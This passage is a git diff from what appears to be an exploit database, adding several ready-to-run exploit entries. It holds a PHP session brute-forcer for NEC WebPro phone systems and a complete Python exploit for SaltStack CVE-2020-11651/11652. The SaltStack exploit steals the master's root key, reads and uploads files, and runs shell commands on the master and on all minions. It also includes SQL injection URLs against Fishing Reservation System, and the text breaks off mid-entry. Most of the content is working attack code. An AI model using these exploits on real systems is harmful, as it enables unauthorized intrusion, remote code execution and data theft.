diff --git a/exploits/hardware/webapps/48425.txt b/exploits/hardware/webapps/48425.txt new file mode 100644 index 000000000..c4a51d59b --- /dev/null +++ b/exploits/hardware/webapps/48425.txt @@ -0,0 +1,63 @@ +# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration +# Author: Cold z3ro +# Date: 2020-05-04 +# Homepage: https://www.0x30.cc/ +# Vendor Homepage: https://www.nec.com +# Version: 01.03.01 +# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration + += $maxproc) + { + while (pcntl_waitpid(0, $status) != -1) + { + $status = pcntl_wexitstatus($status); + $execute =0; + usleep(3000); + } + } + if (!$pid) + { + echo $url . " checking $i\n"; + login($url, $i); + flush(); + exit; + } +} + + +function login($url, $key) +{ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#'); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80); + curl_setopt($ch, CURLOPT_TIMEOUT, 80); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + curl_setopt($ch, CURLOPT_HEADER, FALSE); + $content = curl_exec($ch); + curl_close ($ch); + if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) + { + die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n"); + + } +} \ No newline at end of file diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt new file mode 100644 index 000000000..5bd051b35 --- /dev/null +++ b/exploits/multiple/remote/48421.txt @@ -0,0 +1,393 @@ +# Exploit Title: Saltstack 3000.1 - Remote Code Execution +# Date: 2020-05-04 +# Exploit Author: Jasper Lievisse Adriaanse +# Vendor Homepage: https://www.saltstack.com/ +# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* +# Tested on: Debian 10 with Salt 2019.2.0 +# CVE : CVE-2020-11651 and CVE-2020-11652 +# Discription: Saltstack authentication bypass/remote code execution +# +# Source: https://github.com/jasperla/CVE-2020-11651-poc +# This exploit is based on this checker script: +# https://github.com/rossengeorgiev/salt-security-backports + +#!/usr/bin/env python +# +# Exploit for CVE-2020-11651 and CVE-2020-11652 +# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) +# This exploit is based on this checker script: +# https://github.com/rossengeorgiev/salt-security-backports + +from __future__ import absolute_import, print_function, unicode_literals +import argparse +import datetime +import os +import os.path +import sys +import time + +import salt +import salt.version +import salt.transport.client +import salt.exceptions + +def init_minion(master_ip, master_port): + minion_config = { + 'transport': 'zeromq', + 'pki_dir': '/tmp', + 'id': 'root', + 'log_level': 'debug', + 'master_ip': master_ip, + 'master_port': master_port, + 'auth_timeout': 5, + 'auth_tries': 1, + 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) + } + + return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') + +# --- check funcs ---- + +def check_salt_version(): + print("[+] Salt version: {}".format(salt.version.__version__)) + + vi = salt.version.__version_info__ + + if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): + return True + else: + return False + +def check_connection(master_ip, master_port, channel): + print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='') + sys.stdout.flush() + + # connection check + try: + channel.send({'cmd':'ping'}, timeout=2) + except salt.exceptions.SaltReqTimeoutError: + print("OFFLINE") + sys.exit(1) + else: + print("ONLINE") + +def check_CVE_2020_11651(channel): + print("[+] Checking if vulnerable to CVE-2020-11651... ", end='') + sys.stdout.flush() + # try to evil + try: + rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("YES") + except: + print("ERROR") + raise + else: + pass + finally: + if rets: + root_key = rets[2]['root'] + return root_key + + return None + +def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): + print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'cmd': 'get_token', + 'arg': [], + 'token': top_secret_file_path, + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("YES") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + print("NO") + +def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.read', + 'path': top_secret_file_path, + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + if rets['data']['return']: + print("YES") + else: + print("NO") + +def check_CVE_2020_11652_write1(debug, channel, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.write', + 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', + 'data': 'evil', + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + + pp(rets) + if rets['data']['return'].startswith('Wrote'): + try: + os.remove('/tmp/salt_CVE_2020_11652') + except OSError: + print("Maybe?") + else: + print("YES") + else: + print("NO") + +def check_CVE_2020_11652_write2(debug, channel, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'config.update_config', + 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', + 'yaml_contents': 'evil', + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + if rets['data']['return'].startswith('Wrote'): + try: + os.remove('/tmp/salt_CVE_2020_11652.conf') + except OSError: + print("Maybe?") + else: + print("YES") + else: + print("NO") + +def pwn_read_file(channel, root_key, path, master_ip): + print("[+] Attemping to read {} from {}".format(path, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.read', + 'path': path, + 'saltenv': 'base', + } + + rets = channel.send(msg, timeout=3) + print(rets['data']['return'][0][path]) + +def pwn_upload_file(channel, root_key, src, dest, master_ip): + print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip)) + sys.stdout.flush() + + try: + fh = open(src, 'rb') + payload = fh.read() + fh.close() + except Exception as e: + print('[-] Failed to read {}: {}'.format(src, e)) + return + + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.write', + 'saltenv': 'base', + 'data': payload, + 'path': dest, + } + + rets = channel.send(msg, timeout=3) + print('[ ] {}'.format(rets['data']['return'])) + +def pwn_exec(channel, root_key, cmd, master_ip, jid): + print("[+] Attemping to execute {} on {}".format(cmd, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': 'runner', + 'fun': 'salt.cmd', + 'saltenv': 'base', + 'user': 'sudo_user', + 'kwarg': { + 'fun': 'cmd.exec_code', + 'lang': 'python', + 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd) + }, + 'jid': jid, + } + + try: + rets = channel.send(msg, timeout=3) + except Exception as e: + print('[-] Failed to submit job') + return + + if rets.get('jid'): + print('[+] Successfully scheduled job: {}'.format(rets['jid'])) + +def pwn_exec_all(channel, root_key, cmd, master_ip, jid): + print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': '_send_pub', + 'fun': 'cmd.run', + 'user': 'root', + 'arg': [ "/bin/sh -c '{}'".format(cmd) ], + 'tgt': '*', + 'tgt_type': 'glob', + 'ret': '', + 'jid': jid + } + + try: + rets = channel.send(msg, timeout=3) + except Exception as e: + print('[-] Failed to submit job') + return + finally: + if rets == None: + print('[+] Successfully submitted job to all minions.') + else: + print('[-] Failed to submit job') + + +def main(): + parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') + parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') + parser.add_argument('--port', '-p', dest='master_port', default='4506') + parser.add_argument('--force', '-f', dest='force', default=False, action='store_false') + parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') + parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') + parser.add_argument('--read', '-r', dest='read_file') + parser.add_argument('--upload-src', dest='upload_src') + parser.add_argument('--upload-dest', dest='upload_dest') + parser.add_argument('--exec', dest='exec', help='Run a command on the master') + parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') + args = parser.parse_args() + + print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.") + time.sleep(1) + + # Both src and destination are required for uploads + if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): + print('[-] Must provide both --upload-src and --upload-dest') + sys.exit(1) + + channel = init_minion(args.master_ip, args.master_port) + + if check_salt_version(): + print("[ ] This version of salt is vulnerable! Check results below") + elif args.force: + print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.") + else: + sys.exit() + + check_connection(args.master_ip, args.master_port, channel) + + root_key = check_CVE_2020_11651(channel) + if root_key: + print('\n[*] root key obtained: {}'.format(root_key)) + else: + print('[-] Failed to find root key...aborting') + sys.exit(127) + + if args.run_checks: + # Assuming this check runs on the master itself, create a file with "secret" content + # and abuse CVE-2020-11652 to read it. + top_secret_file_path = '/tmp/salt_cve_teta' + with salt.utils.fopen(top_secret_file_path, 'w') as fd: + fd.write("top secret") + + # Again, this assumes we're running this check on the master itself + with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: + root_key = keyfd.read() + + check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) + check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) + check_CVE_2020_11652_write1(debug, channel, root_key) + check_CVE_2020_11652_write2(debug, channel, root_key) + os.remove(top_secret_file_path) + sys.exit(0) + + if args.read_file: + pwn_read_file(channel, root_key, args.read_file, args.master_ip) + + if args.upload_src: + if os.path.isabs(args.upload_dest): + print('[-] Destination path must be relative; aborting') + sys.exit(1) + pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) + + + jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) + + if args.exec: + pwn_exec(channel, root_key, args.exec, args.master_ip, jid) + + if args.exec_all: + print("[!] Lester, is this what you want? Hit ^C to abort.") + time.sleep(2) + pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/48413.txt b/exploits/php/webapps/48413.txt index 4891a3f3a..50cc95f4f 100644 --- a/exploits/php/webapps/48413.txt +++ b/exploits/php/webapps/48413.txt @@ -31,11 +31,4 @@ Parameter file: /scp/slass.php I used the name of the SLA for any ticket. -## Risk : cookie information of the target user is obtained. - -# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz. -# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına -# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz -# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler -# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir. -# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz. \ No newline at end of file +## Risk : cookie information of the target user is obtained. \ No newline at end of file diff --git a/exploits/php/webapps/48417.txt b/exploits/php/webapps/48417.txt new file mode 100644 index 000000000..b54b9766e --- /dev/null +++ b/exploits/php/webapps/48417.txt @@ -0,0 +1,143 @@ +# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection +# Author: Vulnerability Laboratory +# Date: 2020-05-05 +# Vendor: https://fishingreservationsystem.com/index.html +# Software: https://fishingreservationsystem.com/features.htm +# CVE: N/A + +Document Title: +=============== +Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2243 + + +Common Vulnerability Scoring System: +==================================== +7.5 + + +Product & Service Introduction: +=============================== +(Copy of the Homepage: https://fishingreservationsystem.com/index.html +& https://fishingreservationsystem.com/features.htm ) + + + +Vulnerability Disclosure Timeline: +================================== +2020-05-04: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Fishing Reservation System application. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The remote sql injection web vulnerabilites are located in the pid, type +and uid parameters of the admin.php control panel file. Guest accounts or +low privileged user accounts are able to inject and execute own +malicious sql commands as statement to compromise the local database and +affected +management system. The request method to inject/execute is GET and the +attack vector is client-side. The vulnerability is a classic order by +remote +sql injection web vulnerability. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a low privileged web-application user / guest account. +Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] GET + +Vulnerable File(s): +[+] cart.php +[+] calender.php +[+] admin.php + +Vulnerable Parameter(s): +[+] uid +[+] pid +[+] type +[+] m +[+] y +[+] code + + +Proof of Concept (PoC): +======================= +The remote sql-injection web vulnerability can be exploited by remote +attackers with guest access or low privileged user account and without +user interaction action. +For security demonstration or to reproduce the remote sql injection web +vulnerability follow the provided information and steps below to continue. + + +PoC: Example +https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]-- +https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]-- +https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID= +- +https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID= +https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID= +https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID= + + +PoC: Exploitation (SQL-Injection) +https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID= +https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +- +https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID= +https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= + + + +PoC: Exploit + + +Fishing Reservation System - SQL INJECTION EXPLOIT (PoC) +